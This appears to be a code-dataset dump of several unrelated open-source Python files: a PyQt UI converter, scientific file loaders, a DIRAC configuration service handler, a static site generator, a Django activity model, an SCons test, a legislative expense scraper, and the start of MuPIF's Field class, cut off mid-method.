escrowed_balances[order['address']][order['asset']] += order['quantity']
return escrowed_balances
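# Illustrative sketch (not from the original source) of the structure returned by
# get_escrowed_balances(); the addresses, asset name and quantities below are
# made-up values:
#
#   escrowed = get_escrowed_balances(['LabcExampleAddr1', 'LdefExampleAddr2'])
#   # escrowed == {
#   #     'LabcExampleAddr1': {'XPT': 1500000000, 'MYASSET': 42},
#   #     'LdefExampleAddr2': {'XPT': 250000000},
#   # }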
| mit | -6,619,063,133,526,564,000 | 51.146953 | 159 | 0.589113 | false |
MalloyDelacroix/DownloaderForReddit | Tools/ui_converter.py | 1 | 5130 | #!/usr/bin/env python
import sys
import os
import subprocess
class Converter:
base_ui_path = os.path.relpath('Resources/ui_files')
base_out_path = os.path.relpath('DownloaderForReddit/guiresources')
def __init__(self, ui_file):
self.ui_file = ui_file
self.callable_methods = [
'about',
'add_reddit_object',
'core_settings',
'database_dialog',
'database_settings',
'display_settings',
'download_settings',
'export_wizard',
'notification_settings',
'output_settings',
'filter_input',
'filter_widget',
'main_window',
'object_info',
'object_settings',
'quick_filter_settings',
'reddit_object_dialog',
'schedule_settings',
'settings',
'update_dialog',
'invalid_dialog',
'existing_names_dialog',
]
def run(self):
if self.ui_file == 'list':
self.list_methods()
self.ui_file = input('GUI file name (or number): ')
try:
name = self.get_method()
method = getattr(self, name)
method()
print('Conversion successful')
except AttributeError:
            print('Command not recognized. Choices are:')
self.list_methods()
def get_method(self):
try:
index = int(self.ui_file)
return self.callable_methods[index]
except ValueError:
return self.ui_file
def list_methods(self):
for x, y in enumerate(self.callable_methods):
print(f'{x}: {y}')
def convert(self, name, *sub_paths):
original = os.getcwd()
os.chdir(os.path.dirname(original)) # change directories so that all file paths in created file are correct
in_path = self.get_in_path(name, *sub_paths)
out_path = self.get_out_path(name, *sub_paths)
command = f'pyuic5 {in_path} -o {out_path}'
# print(command)
subprocess.run(command)
os.chdir(original)
def get_in_path(self, name, *sub_paths):
name = f'{name}.ui'
return os.path.join(self.base_ui_path, *sub_paths, name)
def get_out_path(self, name, *sub_paths):
name = f'{name}_auto.py'
return os.path.join(self.base_out_path, *sub_paths, name)
def about(self):
name = 'about_dialog'
self.convert(name)
def add_reddit_object(self):
name = 'add_reddit_object_dialog'
self.convert(name)
def main_window(self):
name = 'downloader_for_reddit_gui'
self.convert(name)
def reddit_object_dialog(self):
name = 'reddit_object_settings_dialog'
self.convert(name)
def update_dialog(self):
name = 'update_dialog'
self.convert(name)
def database_dialog(self):
name = 'database_dialog'
self.convert(name, 'database_views')
def filter_input(self):
name = 'filter_input_widget'
self.convert(name, 'database_views')
def filter_widget(self):
name = 'filter_widget'
self.convert(name, 'database_views')
def core_settings(self):
name = 'core_settings_widget'
self.convert(name, 'settings')
def database_settings(self):
name = 'database_settings_widget'
self.convert(name, 'settings')
def display_settings(self):
name = 'display_settings_widget'
self.convert(name, 'settings')
def download_settings(self):
name = 'download_settings_widget'
self.convert(name, 'settings')
def export_wizard(self):
name = 'export_wizard'
self.convert(name)
def notification_settings(self):
name = 'notification_settings_widget'
self.convert(name, 'settings')
def output_settings(self):
name = 'output_settings_widget'
self.convert(name, 'settings')
def quick_filter_settings(self):
name = 'quick_filter_settings_widget'
self.convert(name, 'settings')
def schedule_settings(self):
name = 'schedule_settings_widget'
self.convert(name, 'settings')
def settings(self):
name = 'settings_dialog'
self.convert(name, 'settings')
def object_info(self):
name = 'object_info_widget'
self.convert(name, 'widgets')
def object_settings(self):
name = 'object_settings_widget'
self.convert(name, 'widgets')
def invalid_dialog(self):
name = 'invalid_reddit_object_dialog'
self.convert(name)
def existing_names_dialog(self):
name = 'existing_names_dialog'
self.convert(name)
def user_auth_wizard(self):
name = 'user_auth_wizard'
self.convert(name)
def main():
try:
command = sys.argv[1]
except IndexError:
print('No class specified')
command = input('GUI Name (or number): ')
converter = Converter(command)
converter.run()
if __name__ == '__main__':
main()
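# Hedged usage sketch (not part of the original script); the invocations below are
# examples based on the callable_methods list above:
#
#   python ui_converter.py about      # converts Resources/ui_files/about_dialog.ui
#   python ui_converter.py list       # prints the numbered method list, then prompts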
| gpl-3.0 | 8,101,822,332,021,041,000 | 26.433155 | 116 | 0.571345 | false |
duncan-r/SHIP | ship/utils/fileloaders/fileloader.py | 1 | 2254 | """
Summary:
Main file loader for the API. This offers convenience methods to make it
simple to load any type of file from one place.
Author:
Duncan Runnacles
Created:
01 Apr 2016
Copyright:
Duncan Runnacles 2016
TODO:
Updates:
"""
from __future__ import unicode_literals
from ship.utils import utilfunctions as uuf
from ship.utils.fileloaders import tuflowloader
from ship.utils.fileloaders import iefloader
from ship.utils.fileloaders import datloader
import logging
logger = logging.getLogger(__name__)
"""logging references with a __name__ set to this module."""
class FileLoader(object):
"""
"""
def __init__(self):
"""
"""
self._known_files = {'ief': iefloader.IefLoader,
'tcf': tuflowloader.TuflowLoader,
'dat': datloader.DatLoader,
'ied': datloader.DatLoader}
self.warnings = []
def loadFile(self, filepath, arg_dict={}):
"""Load a file from disk.
Args:
filepath (str): the path to the file to load.
arg_dict={}(Dict): contains keyword referenced arguments needed by
any of the loaders. E.g. the TuflowLoader can take some
scenario values.
Returns:
The object created by the individual file loaders. E.g. for .dat
files this will be an IsisUnitCollection. See the individual
ALoader implementations for details of return types.
Raises:
AttributeError: if the file type is not tcf/dat/ief/ied.
See Also:
            :class:`ALoader`
            :class:`IefLoader`
            :class:`TuflowLoader`
            :class:`DatLoader`
"""
ext = uuf.fileExtensionWithoutPeriod(filepath)
if not ext.lower() in self._known_files:
logger.error('File type %s is not currently supported for loading' % ext)
raise AttributeError('File type %s is not currently supported for loading' % ext)
loader = self._known_files[ext]()
contents = loader.loadFile(filepath, arg_dict)
self.warnings = loader.warnings
del loader
return contents
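    # Hedged usage sketch (not part of the original module); the file path is a
    # hypothetical example:
    #
    #   loader = FileLoader()
    #   model = loader.loadFile('C:/models/kennet1.ief')
    #   for warning in loader.warnings:
    #       print(warning)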
| mit | 366,836,191,615,290,940 | 26.82716 | 93 | 0.60071 | false |
arrabito/DIRAC | ConfigurationSystem/Service/ConfigurationHandler.py | 1 | 3918 | """ The CS! (Configuration Service)
"""
__RCSID__ = "$Id$"
from DIRAC.Core.Utilities.ReturnValues import S_OK, S_ERROR
from DIRAC.ConfigurationSystem.private.ServiceInterface import ServiceInterface
from DIRAC.Core.DISET.RequestHandler import RequestHandler
from DIRAC.Core.Utilities import DErrno
gServiceInterface = None
gPilotSynchronizer = None
def initializeConfigurationHandler(serviceInfo):
global gServiceInterface
gServiceInterface = ServiceInterface(serviceInfo['URL'])
return S_OK()
class ConfigurationHandler(RequestHandler):
""" The CS handler
"""
types_getVersion = []
def export_getVersion(self):
return S_OK(gServiceInterface.getVersion())
types_getCompressedData = []
def export_getCompressedData(self):
sData = gServiceInterface.getCompressedConfigurationData()
return S_OK(sData)
types_getCompressedDataIfNewer = [basestring]
def export_getCompressedDataIfNewer(self, sClientVersion):
sVersion = gServiceInterface.getVersion()
retDict = {'newestVersion': sVersion}
if sClientVersion < sVersion:
retDict['data'] = gServiceInterface.getCompressedConfigurationData()
return S_OK(retDict)
types_publishSlaveServer = [basestring]
def export_publishSlaveServer(self, sURL):
gServiceInterface.publishSlaveServer(sURL)
return S_OK()
types_commitNewData = [basestring]
def export_commitNewData(self, sData):
global gPilotSynchronizer
credDict = self.getRemoteCredentials()
if 'DN' not in credDict or 'username' not in credDict:
return S_ERROR("You must be authenticated!")
res = gServiceInterface.updateConfiguration(sData, credDict['username'])
if not res['OK']:
return res
# Check the flag for updating the pilot 3 JSON file
if self.srv_getCSOption('UpdatePilotCStoJSONFile', False) and gServiceInterface.isMaster():
if gPilotSynchronizer is None:
try:
# This import is only needed for the Master CS service, making it conditional avoids
# dependency on the git client preinstalled on all the servers running CS slaves
from DIRAC.WorkloadManagementSystem.Utilities.PilotCStoJSONSynchronizer import PilotCStoJSONSynchronizer
except ImportError as exc:
self.log.exception("Failed to import PilotCStoJSONSynchronizer", repr(exc))
return S_ERROR(DErrno.EIMPERR, 'Failed to import PilotCStoJSONSynchronizer')
gPilotSynchronizer = PilotCStoJSONSynchronizer()
return gPilotSynchronizer.sync()
return res
types_writeEnabled = []
def export_writeEnabled(self):
return S_OK(gServiceInterface.isMaster())
types_getCommitHistory = []
def export_getCommitHistory(self, limit=100):
if limit > 100:
limit = 100
history = gServiceInterface.getCommitHistory()
if limit:
history = history[:limit]
return S_OK(history)
types_getVersionContents = [list]
def export_getVersionContents(self, versionList):
contentsList = []
for version in versionList:
retVal = gServiceInterface.getVersionContents(version)
if retVal['OK']:
contentsList.append(retVal['Value'])
else:
return S_ERROR("Can't get contents for version %s: %s" % (version, retVal['Message']))
return S_OK(contentsList)
types_rollbackToVersion = [basestring]
def export_rollbackToVersion(self, version):
retVal = gServiceInterface.getVersionContents(version)
if not retVal['OK']:
return S_ERROR("Can't get contents for version %s: %s" % (version, retVal['Message']))
credDict = self.getRemoteCredentials()
if 'DN' not in credDict or 'username' not in credDict:
return S_ERROR("You must be authenticated!")
return gServiceInterface.updateConfiguration(retVal['Value'],
credDict['username'],
updateVersionOption=True)
| gpl-3.0 | -4,709,197,104,656,305,000 | 33.368421 | 114 | 0.710822 | false |
lunixbochs/nullstatic | gen.py | 1 | 2581 | #!/usr/bin/env python2
from collections import defaultdict
from datetime import date, datetime
from email.Utils import formatdate
import frontmatter
import jinja2
import markdown
import os
import sys
import time
import yaml
@jinja2.contextfilter
def _render(context, data):
return env.from_string(data['source']).render(**context)
def datekey(entry):
d = entry.get('date', date.min)
if isinstance(d, date):
d = datetime.combine(d, datetime.min.time())
return d
def strip_path(base, path):
return path.replace(base, '', 1).lstrip(os.sep)
def gen(base, out):
env = jinja2.Environment(trim_blocks=True, lstrip_blocks=True, loader=jinja2.FileSystemLoader(base))
env.filters['render'] = _render
env.filters['markdown'] = markdown.markdown
env.filters['date'] = lambda x: x.strftime('%Y-%m-%d')
env.filters['rfc822'] = lambda x: formatdate(time.mktime(x.timetuple()))
env.filters['datesort'] = lambda x: sorted(x, key=lambda k: datekey(k))
tree = defaultdict(list)
for root, dirs, files in os.walk(base):
root = strip_path(base, root)
for name in files:
if name.endswith('.j2'):
path = os.path.join(base, root, name)
post = frontmatter.load(path)
data = {'name': name.rsplit('.', 1)[0], 'src': path, 'source': post.content}
data.update(post)
data['ext'] = data.get('ext', (os.path.splitext(data.get('render', ''))[1] if not '.' in data['name'] else ''))
data['url'] = data.get('url', data['name']) + data['ext']
data['dst'] = os.path.join(out, os.path.dirname(strip_path(base, path)), data['url'])
tree[root].append(data)
for template in (t for ts in tree.values() for t in ts):
source, render = map(template.get, ('source', 'render'), (None, ''))
if source is not None:
if render:
source = open(os.path.join(base, render), 'r').read().decode('utf-8')
ctx = {cat: templates for cat, templates in tree.items() if cat}
ctx.update(tree=tree, **template)
data = env.from_string(source).render(**ctx)
dstdir = os.path.dirname(template['dst'])
if not os.path.exists(dstdir):
os.makedirs(dstdir)
with open(template['dst'], 'w') as o:
o.write(data.encode('utf-8'))
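# Hedged sketch (not from the original project) of the front matter gen() expects
# in a *.j2 source file; the file name and keys below are illustrative:
#
#   # src/posts/hello.j2
#   ---
#   title: Hello
#   date: 2015-01-01
#   url: hello.html
#   ---
#   <h1>{{ title }}</h1> published {{ date|date }}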
if __name__ == '__main__':
import sys
if len(sys.argv) != 3:
print('Usage: gen.py <src> <out>')
sys.exit(1)
gen(*sys.argv[1:])
| mit | -623,981,896,369,554,700 | 37.522388 | 127 | 0.586594 | false |
owais/django-simple-activity | simple_activity/models.py | 1 | 1965 | from django.db import models
from django.utils.timezone import now
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from filtered_contenttypes.fields import FilteredGenericForeignKey
from django_pgjson.fields import JsonBField
from .managers import ActionManager
from . import settings as app_settings
from . import registry
def _default_action_meta():
return {}
class Action(models.Model):
item_type = models.ForeignKey(ContentType, related_name='actions')
item_id = models.PositiveIntegerField()
item = FilteredGenericForeignKey('item_type', 'item_id')
target_type = models.ForeignKey(ContentType, blank=True, null=True,
related_name='target_actions')
target_id = models.PositiveIntegerField(blank=True, null=True)
target = FilteredGenericForeignKey('target_type', 'target_id')
actor = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='activity')
verb = models.CharField(max_length=23,
choices=registry.as_model_choices())
published = models.DateTimeField(auto_now_add=True)
meta = JsonBField(default=_default_action_meta, blank=True)
objects = ActionManager()
class Meta:
abstract = app_settings.get('ACTION_MODEL') != 'simple_activity.Action'
ordering = ('-published',)
@classmethod
def add_action(klass, verb, actor, item, target=None, published=None,
meta={}):
if not registry.is_valid(verb):
raise ValueError('`{}` not a valid verb.'.format(verb))
published = published or now()
create_kwargs = {'actor': actor, 'item': item, 'verb': verb.code}
if target:
create_kwargs['target'] = target
create_kwargs['published'] = published
klass.objects.create(**create_kwargs)
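    # Hedged usage sketch (not part of the original module); the verb lookup and the
    # model instances below are assumptions for illustration:
    #
    #   from simple_activity import registry
    #   verb = registry.get_from_code('like')      # assumes a 'like' verb was registered
    #   Action.add_action(verb, actor=request.user, item=photo, target=album)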
@property
def verb_object(self):
return registry.get_from_code(self.verb)
| bsd-2-clause | 2,345,284,087,180,824,000 | 34.727273 | 80 | 0.672774 | false |
EmanueleCannizzaro/scons | test/Clean/Option.py | 1 | 2620 | #!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/Clean/Option.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
"""
Verify that {Set,Get}Option('clean') works correctly to control
cleaning behavior.
"""
import os
import TestSCons
_python_ = TestSCons._python_
test = TestSCons.TestSCons()
test.write('build.py', r"""
import sys
contents = open(sys.argv[2], 'rb').read()
file = open(sys.argv[1], 'wb')
file.write(contents)
file.close()
""")
test.write('SConstruct', """
B = Builder(action = r'%(_python_)s build.py $TARGETS $SOURCES')
env = Environment(BUILDERS = { 'B' : B })
env.B(target = 'foo.out', source = 'foo.in')
mode = ARGUMENTS.get('MODE')
if mode == 'not':
assert not GetOption('clean')
if mode == 'set-zero':
assert GetOption('clean')
SetOption('clean', 0)
assert GetOption('clean')
if mode == 'set-one':
assert not GetOption('clean')
SetOption('clean', 1)
assert GetOption('clean')
""" % locals())
test.write('foo.in', '"Foo", I say!\n')
test.run(arguments='foo.out MODE=not')
test.must_match(test.workpath('foo.out'), '"Foo", I say!\n')
test.run(arguments='-c foo.out MODE=set-zero')
test.must_not_exist(test.workpath('foo.out'))
test.run(arguments='foo.out MODE=none')
test.must_match(test.workpath('foo.out'), '"Foo", I say!\n')
test.run(arguments='foo.out MODE=set-one')
test.must_not_exist(test.workpath('foo.out'))
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mit | -4,647,620,131,027,711,000 | 29.465116 | 94 | 0.711832 | false |
olhoneles/olhoneles | montanha/management/commands/collectors/algo.py | 1 | 12094 | # -*- coding: utf-8 -*-
#
# Copyright (©) 2010-2013 Estêvão Samuel Procópio
# Copyright (©) 2010-2013 Gustavo Noronha Silva
# Copyright (©) 2013 Marcelo Jorge Vieira
# Copyright (©) 2014 Wilson Pinto Júnior
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import json
import operator
import os
import re
import rows
from datetime import datetime
from io import BytesIO
from cStringIO import StringIO
from cachetools import Cache, cachedmethod
from django.core.files import File
from basecollector import BaseCollector
from montanha.models import (
Institution, Legislature, PoliticalParty, Legislator, ExpenseNature,
ArchivedExpense, Mandate
)
class ALGO(BaseCollector):
TITLE_REGEX = re.compile(r'\d+ - (.*)')
MONEY_RE = re.compile(r'([0-9.,]+)[,.]([0-9]{2})$')
def __init__(self, *args, **kwargs):
super(ALGO, self).__init__(*args, **kwargs)
self.base_url = 'http://al.go.leg.br'
self.institution, _ = Institution.objects.get_or_create(
siglum='ALGO', name=u'Assembléia Legislativa do Estado de Goiás'
)
self.legislature, _ = Legislature.objects.get_or_create(
institution=self.institution,
date_start=datetime(2015, 1, 1),
date_end=datetime(2018, 12, 31)
)
self.list_of_legislators_cache = Cache(1024)
self.expenses_nature_cached = {}
def _normalize_party_siglum(self, siglum):
names_map = {
'SDD': 'Solidariedade',
}
return names_map.get(siglum, siglum)
def update_legislators(self):
url = self.base_url + '/deputado/'
html = self.retrieve_uri(url, post_process=False, force_encoding='utf-8')
rows_xpath = u'//tbody/tr'
fields_xpath = {
u'nome': u'./td[position()=1]/a/text()',
u'url': u'./td[position()=1]/a/@href',
u'party': u'./td[position()=2]/text()',
u'telefone': u'./td[position()=3]/text()',
u'fax': u'./td[position()=4]/text()',
u'email': u'./td[position()=5]/a[position()=1]/img/@title',
}
table = rows.import_from_xpath(BytesIO(html.encode('utf-8')), rows_xpath, fields_xpath)
url_regex = re.compile(r'.*id/(\d+)')
email_regex = re.compile(r'Email: (.*)')
for row in table:
_id = url_regex.match(row.url).group(1)
email = None
if row.email:
email = email_regex.match(row.email).group(1).strip()
party_siglum = self._normalize_party_siglum(row.party)
party, party_created = PoliticalParty.objects.get_or_create(
siglum=party_siglum
)
self.debug(u'New party: {0}'.format(party))
legislator, created = Legislator.objects.get_or_create(name=row.nome)
legislator.site = self.base_url + row.url
legislator.email = email
legislator.save()
if created:
self.debug(u'New legislator: {0}'.format(legislator))
else:
self.debug(u'Found existing legislator: {0}'.format(legislator))
self.mandate_for_legislator(legislator, party, original_id=_id)
@classmethod
def parse_title(self, title):
if '-' in title:
match = self.TITLE_REGEX.search(title)
if match:
return match.group(1).encode('utf-8')
return title.encode('utf-8')
@classmethod
def parse_money(self, value):
match = self.MONEY_RE.search(value)
if match:
return float('{0}.{1}'.format(
match.group(1).replace('.', '').replace(',', ''),
match.group(2)
))
else:
raise ValueError('Cannot convert {0} to float (money)'.format(value))
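    # Illustrative behaviour of the money parser above (values are examples, not
    # taken from the original test suite):
    #   ALGO.parse_money('1.234,56')   -> 1234.56
    #   ALGO.parse_money('R$ 10,00')   -> 10.0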
def get_parlamentar_id(self, year, month, name):
legislators = self.get_list_of_legislators(year, month)
legislators = [i for i in legislators if i['nome'] == name]
if not legislators:
return
return legislators[0]['id']
@cachedmethod(operator.attrgetter('list_of_legislators_cache'))
def get_list_of_legislators(self, year, month):
url = '{0}/transparencia/verbaindenizatoria/listardeputados?ano={1}&mes={2}'.format(
self.base_url,
year,
month,
)
data = json.loads(self.retrieve_uri(url, force_encoding='utf8').text)
return data['deputados']
def find_data_for_month(self, mandate, year, month):
parlamentar_id = self.get_parlamentar_id(year, month, mandate.legislator.name)
if not parlamentar_id:
self.debug(
u'Failed to discover parlamentar_id for year={0}, month={1}, legislator={2}'.format(
year, month, mandate.legislator.name,
)
)
raise StopIteration
url = '{0}/transparencia/verbaindenizatoria/exibir?ano={1}&mes={2}&parlamentar_id={3}'.format(
self.base_url, year, month, parlamentar_id
)
data = self.retrieve_uri(url, force_encoding='utf8')
if u'parlamentar não prestou contas para o mês' in data.text:
self.debug(u'not found data for: {0} -> {1}/{2}'.format(
mandate.legislator, year, month
))
raise StopIteration
container = data.find('div', id='verba')
        if not container:
            self.debug('div#verba not found')
            raise StopIteration
table = container.find('table', recursive=False)
if not table:
self.debug('table.tabela-verba-indenizatoria not found')
raise StopIteration
group_trs = table.findAll('tr', {'class': 'verba_titulo'})
for tr in group_trs:
budget_title = self.parse_title(tr.text)
budget_subtitle = None
while True:
tr = tr.findNext('tr')
if not tr:
break
tr_class = tr.get('class')
if tr.get('class') == 'verba_titulo':
break
elif tr_class == 'info-detalhe-verba':
for data in self.parse_detale_verba(tr, budget_title, budget_subtitle):
yield data
elif tr_class == 'subtotal':
continue
elif len(tr.findAll('td')) == 3:
tds = tr.findAll('td')
budget_subtitle = self.parse_title(tds[0].text)
next_tr = tr.findNext('tr')
break_classes = ('subtotal', 'info-detalhe-verba', 'verba_titulo')
if next_tr.get('class') in break_classes:
continue
value_presented = self.parse_money(tds[1].text)
value_expensed = self.parse_money(tds[2].text)
if not value_expensed or not value_presented:
continue
data = {
'budget_title': budget_title,
'budget_subtitle': budget_subtitle,
'value_presented': value_presented,
'date': '1/%d/%d' % (month, year),
'value_expensed': value_expensed,
'number': 'Sem número'
}
self.debug(u'Generated JSON: {0}'.format(data))
yield data
def parse_detale_verba(self, elem, budget_title, budget_subtitle):
rows_xpath = u'//tbody/tr'
fields_xpath = {
u'nome': u'./td[position()=1]/text()',
u'cpf_cnpj': u'./td[position()=2]/text()',
u'date': u'./td[position()=3]/text()',
u'number': u'./td[position()=4]/text()',
u'value_presented': u'./td[position()=5]/text()',
u'value_expensed': u'./td[position()=6]/text()',
}
table = rows.import_from_xpath(
BytesIO(str(elem)), rows_xpath, fields_xpath)
for row in table:
data = dict(row.__dict__)
data.update({
'budget_title': budget_title,
'budget_subtitle': budget_subtitle,
'cpf_cnpj': self.normalize_cnpj_or_cpf(row.cpf_cnpj),
'value_presented': self.parse_money(row.value_presented),
'value_expensed': self.parse_money(row.value_expensed),
})
self.debug(u'Generated JSON: {0}'.format(data))
yield data
def get_or_create_expense_nature(self, name):
if name not in self.expenses_nature_cached:
try:
nature = ExpenseNature.objects.get(name=name)
except ExpenseNature.DoesNotExist:
nature = ExpenseNature(name=name)
nature.save()
self.expenses_nature_cached[name] = nature
return self.expenses_nature_cached[name]
def update_data_for_month(self, mandate, year, month):
for data in self.find_data_for_month(mandate, year, month):
nature = self.get_or_create_expense_nature(
'{0}: {1}'.format(data['budget_title'], data['budget_subtitle'])
)
name = data.get('nome') or 'Sem nome'
no_identifier = u'Sem CPF/CNPJ ({0})'.format(name)
cpf_cnpj = data.get('cpf_cnpj', no_identifier)
supplier = self.get_or_create_supplier(cpf_cnpj, name)
date = datetime.strptime(data['date'], '%d/%m/%Y')
expense = ArchivedExpense(
number=data.get('number', ''),
nature=nature,
date=date,
value=data['value_presented'],
expensed=data['value_expensed'],
mandate=mandate,
supplier=supplier,
collection_run=self.collection_run,
)
expense.save()
def update_images(self):
mandates = Mandate.objects.filter(legislature=self.legislature, legislator__picture='')
headers = {
'Referer': self.base_url + '/deputado/',
'Origin': self.base_url,
}
deputado_data = self.retrieve_uri(self.base_url + '/deputado/', headers=headers)
for mandate in mandates:
leg = mandate.legislator
found_text = deputado_data.find(text=re.compile(leg.name))
if not found_text:
self.debug(u'Legislator not found in page: {0}'.format(mandate.legislator.name))
continue
tr = found_text.findParents('tr')[0]
tds = tr.findAll('td')
detail_path = tds[0].find('a')['href']
detail_url = self.base_url + detail_path
detail_data = self.retrieve_uri(detail_url, headers=headers)
photo_container = detail_data.find('div', {'class': re.compile(r'foto')})
photo_url = photo_container.find('img')['src']
photo_data = self.retrieve_uri(self.base_url + photo_url, post_process=False, return_content=True)
photo_buffer = StringIO(photo_data)
photo_buffer.seek(0)
leg.picture.save(os.path.basename(photo_url), File(photo_buffer))
leg.save()
            self.debug('Saved {0} Image URL: {1}'.format(leg.name, photo_url))
else:
self.debug('All legislators have photos')
| agpl-3.0 | -3,635,771,197,065,837,000 | 34.532353 | 110 | 0.552934 | false |
mupif/mupif | mupif/Field.py | 1 | 42683 | #
# MuPIF: Multi-Physics Integration Framework
# Copyright (C) 2010-2015 Borek Patzak
#
# Czech Technical University, Faculty of Civil Engineering,
# Department of Structural Mechanics, 166 29 Prague, Czech Republic
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301 USA
#
from builtins import range
from builtins import object
from . import Cell
from . import FieldID
from . import ValueType
from . import BBox
from . import APIError
from . import MupifObject
from . import Mesh
from .Physics import PhysicalQuantities
from .Physics.PhysicalQuantities import PhysicalQuantity
from numpy import array, arange, random, zeros
import numpy
import copy
import Pyro4
from enum import IntEnum
import logging
log = logging.getLogger()
try:
import cPickle as pickle # faster serialization if available
except:
import pickle
# import logging - never use it here, it causes cPickle.PicklingError: Can't pickle <type 'thread.lock'>: attribute
# lookup thread.lock failed
# debug flag
debug = 0
class FieldType(IntEnum):
"""
Represent the supported values of FieldType, i.e. FT_vertexBased or FT_cellBased.
"""
FT_vertexBased = 1
FT_cellBased = 2
@Pyro4.expose
class Field(MupifObject.MupifObject, PhysicalQuantity):
"""
Representation of field. Field is a scalar, vector, or tensorial
quantity defined on a spatial domain. The field, however is assumed
to be fixed at certain time. The field can be evaluated in any spatial point
belonging to underlying domain.
Derived classes will implement fields defined on common discretizations,
like fields defined on structured/unstructured FE meshes, FD grids, etc.
.. automethod:: __init__
.. automethod:: _evaluate
"""
def __init__(self, mesh, fieldID, valueType, units, time, values=None, fieldType=FieldType.FT_vertexBased, objectID=0, metaData={}):
"""
Initializes the field instance.
:param Mesh.Mesh mesh: Instance of a Mesh class representing the underlying discretization
:param FieldID fieldID: Field type (displacement, strain, temperature ...)
:param ValueType valueType: Type of field values (scalar, vector, tensor). Tensor is a tuple of 9 values. It is changed to 3x3 for VTK output automatically.
:param Physics.PhysicalUnits units: Field value units
:param Physics.PhysicalQuantity time: Time associated with field values
:param values: Field values (format dependent on a particular field type, however each individual value should be stored as tuple, even scalar value)
:type values: list of tuples representing individual values
:param FieldType fieldType: Optional, determines field type (values specified as vertex or cell values), default is FT_vertexBased
:param int objectID: Optional ID of problem object/subdomain to which field is related, default = 0
:param dict metaData: Optionally pass metadata for merging
"""
super(Field, self).__init__()
self.mesh = mesh
self.fieldID = fieldID
self.valueType = valueType
self.time = time
self.uri = None # pyro uri; used in distributed setting
# self.log = logging.getLogger()
self.fieldType = fieldType
self.objectID = objectID
if values is None:
if self.fieldType == FieldType.FT_vertexBased:
ncomponents = mesh.getNumberOfVertices()
else:
ncomponents = mesh.getNumberOfCells()
self.value = zeros((ncomponents, self.getRecordSize()))
else:
self.value = values
if PhysicalQuantities.isPhysicalUnit(units):
self.unit = units
else:
self.unit = PhysicalQuantities.findUnit(units)
self.setMetadata('Units', self.unit.name())
self.setMetadata('Type', 'mupif.Field.Field')
self.setMetadata('Type_ID', str(self.fieldID))
self.setMetadata('FieldType', str(fieldType))
self.setMetadata('ValueType', str(self.valueType))
self.updateMetadata(metaData)
@classmethod
def loadFromLocalFile(cls, fileName):
"""
Alternative constructor which loads instance directly from a Pickle module.
:param str fileName: File name
:return: Returns Field instance
:rtype: Field
"""
return pickle.load(open(fileName, 'rb'))
def getRecordSize(self):
"""
Return the number of scalars per value, depending on :obj:`valueType` passed when constructing the instance.
:return: number of scalars (1,3,9 respectively for scalar, vector, tensor)
:rtype: int
"""
if self.valueType == ValueType.Scalar:
return 1
elif self.valueType == ValueType.Vector:
return 3
elif self.valueType == ValueType.Tensor:
return 9
else:
raise ValueError("Invalid value of Field.valueType (%d)." % self.valueType)
def getMesh(self):
"""
Obtain mesh.
:return: Returns a mesh of underlying discretization
:rtype: Mesh.Mesh
"""
return self.mesh
def getValueType(self):
"""
Returns ValueType of the field, e.g. scalar, vector, tensor.
:return: Returns value type of the receiver
:rtype: ValueType
"""
return self.valueType
def getFieldID(self):
"""
Returns FieldID, e.g. FID_Displacement, FID_Temperature.
:return: Returns field ID
:rtype: FieldID
"""
return self.fieldID
def getFieldIDName(self):
"""
Returns name of the field.
:return: Returns fieldID name
:rtype: string
"""
return self.fieldID.name
def getFieldType(self):
"""
Returns receiver field type (values specified as vertex or cell values)
:return: Returns fieldType id
:rtype: FieldType
"""
return self.fieldType
def getTime(self):
"""
Get time of the field.
:return: Time of field data
:rtype: Physics.PhysicalQuantity
"""
return self.time
def evaluate(self, positions, eps=0.0):
"""
Evaluates the receiver at given spatial position(s).
:param positions: 1D/2D/3D position vectors
:type positions: tuple, a list of tuples
:param float eps: Optional tolerance for probing whether the point belongs to a cell (should really not be used)
:return: field value(s)
:rtype: Physics.PhysicalQuantity with given value or tuple of values
"""
# test if positions is a list of positions
if isinstance(positions, list):
ans = []
for pos in positions:
ans.append(self._evaluate(pos, eps))
return PhysicalQuantity(ans, self.unit)
else:
# single position passed
